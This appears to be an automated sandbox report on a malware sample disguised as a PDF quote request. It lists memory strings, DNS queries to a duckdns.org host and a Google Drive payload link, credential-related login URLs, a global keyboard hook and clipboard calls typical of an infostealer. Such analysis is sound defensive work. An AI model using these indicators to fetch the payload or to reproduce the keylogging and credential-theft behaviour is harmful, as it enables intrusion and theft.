Source: Fatherhoods.exe, 00000007.00000002.2601725533.0000000022840000.00000040.10000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000011.00000002.2231137977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2256987761.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: a458386d9.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: bhv1A81.tmp.17.dr, bhv322F.tmp.20.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv1A81.tmp.17.dr, bhv322F.tmp.20.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: svchost.exe, 00000010.00000002.2584436490.000001BFC1400000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: bhv1A81.tmp.17.dr, bhv322F.tmp.20.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv1A81.tmp.17.dr, bhv322F.tmp.20.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv1A81.tmp.17.dr, bhv322F.tmp.20.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: qmgr.db.16.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.16.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.16.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.16.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.16.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.16.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.16.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006131000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/
Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006098000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2141588368.000000000617E000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000002.2588286581.0000000006131000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006131000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp%
Source: Fatherhoods.exe, 00000007.00000003.2149535851.0000000006178000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2263200825.000000000617D000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2141588368.000000000617E000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000002.2588747870.000000000617E000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2145138136.000000000617E000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2260711822.000000000617D000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2148288110.0000000006172000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpC
Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006131000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gphy
Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006131000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gplr
Source: Fatherhoods.exe, Fatherhoods.exe, 00000007.00000000.1925625738.000000000040A000.00000008.00000001.01000000.0000000B.sdmp, Fatherhoods.exe, 00000011.00000000.2150022717.000000000040A000.00000008.00000001.01000000.0000000B.sdmp, Fatherhoods.exe, 00000012.00000000.2152159664.000000000040A000.00000008.00000001.01000000.0000000B.sdmp, Fatherhoods.exe, 00000013.00000000.2154113588.000000000040A000.00000008.00000001.01000000.0000000B.sdmp, Fatherhoods.exe, 00000014.00000000.2211751969.000000000040A000.00000008.00000001.01000000.0000000B.sdmp, Fatherhoods.exe, 00000015.00000000.2214857913.000000000040A000.00000008.00000001.01000000.0000000B.sdmp, Fatherhoods.exe, 00000016.00000000.2218115318.000000000040A000.00000008.00000001.01000000.0000000B.sdmp, RFQ24060084#U00b7pdf.exe, Fatherhoods.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: RFQ24060084#U00b7pdf.exe, Fatherhoods.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2122860403.000000000649E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhv1A81.tmp.17.dr, bhv322F.tmp.20.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000002.00000002.2117741495.0000000005586000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2117741495.0000000005431000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2117741495.0000000005586000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Fatherhoods.exe, Fatherhoods.exe, 00000016.00000002.2229554606.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: Fatherhoods.exe, Fatherhoods.exe, 00000016.00000003.2225754789.000000000094D000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000016.00000002.2229554606.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000016.00000003.2225255453.000000000094D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: Fatherhoods.exe, 00000013.00000003.2164362005.00000000005DD000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000013.00000003.2163981255.00000000005DD000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000016.00000003.2225754789.000000000094D000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000016.00000003.2225255453.000000000094D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.coma
Source: Fatherhoods.exe, 00000007.00000002.2602557067.0000000022BF0000.00000040.10000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000013.00000002.2165469830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000016.00000002.2229554606.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: Fatherhoods.exe, 00000007.00000002.2602557067.0000000022BF0000.00000040.10000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000013.00000002.2165469830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000016.00000002.2229554606.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: Fatherhoods.exe, 00000011.00000002.2230456263.0000000000193000.00000004.00000010.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2256856052.0000000000193000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: Fatherhoods.exe, 00000016.00000002.2229554606.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: powershell.exe, 00000002.00000002.2117741495.0000000005431000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: Fatherhoods.exe, 00000007.00000003.2074597801.0000000006139000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2074335170.0000000006139000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.2122860403.000000000649E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2122860403.000000000649E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2122860403.000000000649E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Fatherhoods.exe, 00000007.00000002.2588286581.00000000060FB000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2109246580.00000000060FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006098000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/Y
Source: Fatherhoods.exe, 00000007.00000002.2600973911.0000000021C80000.00000004.00001000.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000002.2588286581.00000000060FB000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2109246580.00000000060FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1gu7TFzxAzIKujXLPBBKz7E7w6NX8hqj3
Source: Fatherhoods.exe, 00000007.00000002.2588286581.00000000060FB000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2109246580.00000000060FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1gu7TFzxAzIKujXLPBBKz7E7w6NX8hqj36
Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006114000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2109207421.000000000612A000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000002.2588286581.0000000006131000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2109246580.0000000006114000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006098000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2109246580.000000000611B000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2074597801.0000000006139000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2074335170.0000000006139000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2109207421.000000000612A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gu7TFzxAzIKujXLPBBKz7E7w6NX8hqj3&export=download
Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006098000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gu7TFzxAzIKujXLPBBKz7E7w6NX8hqj3&export=downloadJ
Source: Fatherhoods.exe, 00000007.00000003.2109207421.000000000612A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gu7TFzxAzIKujXLPBBKz7E7w6NX8hqj3&export=downloadT
Source: Fatherhoods.exe, 00000007.00000003.2109207421.000000000612A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gu7TFzxAzIKujXLPBBKz7E7w6NX8hqj3&export=downloade
Source: Fatherhoods.exe, 00000007.00000003.2109246580.0000000006114000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/hQ
Source: edb.log.16.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000010.00000003.2123201630.000001BFC1600000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.16.dr, edb.log.16.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: powershell.exe, 00000002.00000002.2117741495.0000000005586000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Fatherhoods.exe, 00000014.00000002.2257376897.00000000006E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?c
Source: Fatherhoods.exe, 00000011.00000002.2232313664.0000000000530000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2257376897.00000000006E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: Fatherhoods.exe, 00000011.00000002.2232313664.0000000000530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.sL
Source: Fatherhoods.exe, 00000014.00000002.2257376897.00000000006E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf
Source: Fatherhoods.exe, 00000011.00000002.2232313664.0000000000530000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2257376897.00000000006E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: Fatherhoods.exe, 00000011.00000002.2232313664.0000000000530000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2257376897.00000000006E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: Fatherhoods.exe, 00000014.00000002.2257376897.00000000006E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srfLMEM
Source: Fatherhoods.exe, 00000011.00000002.2232313664.0000000000530000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000011.00000003.2229531439.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000003.2256602148.0000000000A49000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2257376897.00000000006E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: Fatherhoods.exe, 00000014.00000002.2257376897.00000000006E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?d
Source: Fatherhoods.exe, Fatherhoods.exe, 00000011.00000002.2234766300.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2257531283.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000002.00000002.2122860403.000000000649E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Fatherhoods.exe, 00000007.00000003.2074597801.0000000006139000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2074335170.0000000006139000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: Fatherhoods.exe, 00000007.00000003.2074335170.000000000612A000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2074597801.0000000006139000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2074335170.0000000006139000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Fatherhoods.exe, Fatherhoods.exe, 00000016.00000002.2229554606.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Fatherhoods.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: Fatherhoods.exe, 00000007.00000003.2074335170.000000000612A000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2074597801.0000000006139000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2074335170.0000000006139000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: Fatherhoods.exe, 00000007.00000003.2074335170.000000000612A000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2074597801.0000000006139000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000003.2074335170.0000000006139000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.10:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.10:49712 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\Fatherhoods.exe

Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	17_2_0040987A
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	17_2_004098E2
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	18_2_00406DFC
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	18_2_00406E9F
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 19_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	19_2_004068B5
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 19_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	19_2_004072B5
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 22_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	22_2_004068B5
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 22_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	22_2_004072B5

Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_04475710 Sleep,NtProtectVirtualMemory,	7_2_04475710
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,	17_2_0040DD85
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_00401806 NtdllDefWindowProc_W,	17_2_00401806
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_004018C0 NtdllDefWindowProc_W,	17_2_004018C0
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_004016FD NtdllDefWindowProc_A,	18_2_004016FD
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_004017B7 NtdllDefWindowProc_A,	18_2_004017B7
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 19_2_00402CAC NtdllDefWindowProc_A,	19_2_00402CAC
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 19_2_00402D66 NtdllDefWindowProc_A,	19_2_00402D66
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 22_2_00402CAC NtdllDefWindowProc_A,	22_2_00402CAC
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 22_2_00402D66 NtdllDefWindowProc_A,	22_2_00402D66

Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe	Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403348
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		7_2_00403348

Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe	Code function: 0_2_00406945	0_2_00406945
Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe	Code function: 0_2_0040711C	0_2_0040711C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0368F000	2_2_0368F000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0368F8D0	2_2_0368F8D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0368ECB8	2_2_0368ECB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07C3BC18	2_2_07C3BC18
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_00406945	7_2_00406945
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_0040711C	7_2_0040711C
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C2B5C1	7_2_22C2B5C1
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C37194	7_2_22C37194
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_0044B040	17_2_0044B040
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_0043610D	17_2_0043610D
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_00447310	17_2_00447310
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_0044A490	17_2_0044A490
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_0040755A	17_2_0040755A
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_0043C560	17_2_0043C560
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_0044B610	17_2_0044B610
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_0044D6C0	17_2_0044D6C0
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_004476F0	17_2_004476F0
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_0044B870	17_2_0044B870
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_0044081D	17_2_0044081D
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_00414957	17_2_00414957
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_004079EE	17_2_004079EE
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_00407AEB	17_2_00407AEB
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_0044AA80	17_2_0044AA80
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_00412AA9	17_2_00412AA9
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_00404B74	17_2_00404B74
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_00404B03	17_2_00404B03
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_0044BBD8	17_2_0044BBD8
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_00404BE5	17_2_00404BE5
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_00404C76	17_2_00404C76
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_00415CFE	17_2_00415CFE
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_00416D72	17_2_00416D72
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_00446D30	17_2_00446D30
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_00446D8B	17_2_00446D8B
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 17_2_00406E8F	17_2_00406E8F
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_00405038	18_2_00405038
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_0041208C	18_2_0041208C
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_004050A9	18_2_004050A9
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_0040511A	18_2_0040511A
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_0043C13A	18_2_0043C13A
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_004051AB	18_2_004051AB
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_00449300	18_2_00449300
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_0040D322	18_2_0040D322
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_0044A4F0	18_2_0044A4F0
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_0043A5AB	18_2_0043A5AB
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_00413631	18_2_00413631
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_00446690	18_2_00446690
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_0044A730	18_2_0044A730
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_004398D8	18_2_004398D8
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_004498E0	18_2_004498E0
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_0044A886	18_2_0044A886
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_0043DA09	18_2_0043DA09
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_00438D5E	18_2_00438D5E
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_00449ED0	18_2_00449ED0
